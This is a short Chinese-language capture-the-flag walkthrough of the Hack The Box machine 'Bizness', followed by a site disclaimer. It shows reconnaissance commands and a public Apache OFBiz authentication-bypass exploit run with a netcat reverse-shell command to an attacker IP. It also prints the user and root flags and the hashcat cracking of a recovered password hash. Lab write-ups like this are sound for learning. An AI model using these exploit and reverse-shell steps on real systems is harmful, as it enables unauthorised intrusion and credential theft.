Main
$ nmap -p- 10.10.11.252 --min-rate 1000
$ dirsearch -u https://bizness.htb/
$ whatweb https://bizness.htb/control/login
存在一个未授权的RCE
$ git clone https://github.com/jakabakos/Apache-OFBiz-Authentication-Bypass.git
$ cd Apache-OFBiz-Authentication-Bypass/
$ python3 exploit.py --url https://bizness.htb/ --cmd 'nc -c bash 10.10.16.23 10032'
User Flag
$ cat /home/ofbiz/user.txt
4f868ad44d8eb00d2d7d094bd5279de0
Root Flag
$ cat /opt/ofbiz/runtime/data/derby/ofbiz/seg0/c54d0.dat
为了使用hashcat等密码破解工具破解这些哈希值,需要先将其进行base64解码,然后转换为十六进制字符串。这是因为hashcat等工具通常需要将哈希值以十六进制字符串的形式输入进行破解。
$ hashcat -m 120 -a 0 -d 1 "b8fd3f41a541a435857a8f3e751cc3a91c174362:d" /usr/share/wordlists/rockyou.txt
$SHA$d$uP0_QaVBpDWFeo8-dRzDqRwXQ2I
- $SHA$: 这部分指示了使用的哈希算法。在这种情况下,$SHA$表示密码是使用SHA哈希算法进行加密的。
d$uP0_QaVBpDWFeo8-dRzDqRwXQ2I: 这部分是经过哈希处理的密码值。通常,密码哈希值是通过将密码与随机生成的字符串(称为盐值)一起输入到哈希函数中生成的。在这个字符串中,d$可能是盐值的一部分,而uP0_QaVBpDWFeo8-dRzDqRwXQ2I可能是密码的哈希值。
# cat /root/root.txt
8c72dd83a893d66bef258dc1c43eb2e4
4A评测 - 免责申明
本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。
不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。
本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。
如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!
程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。
侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)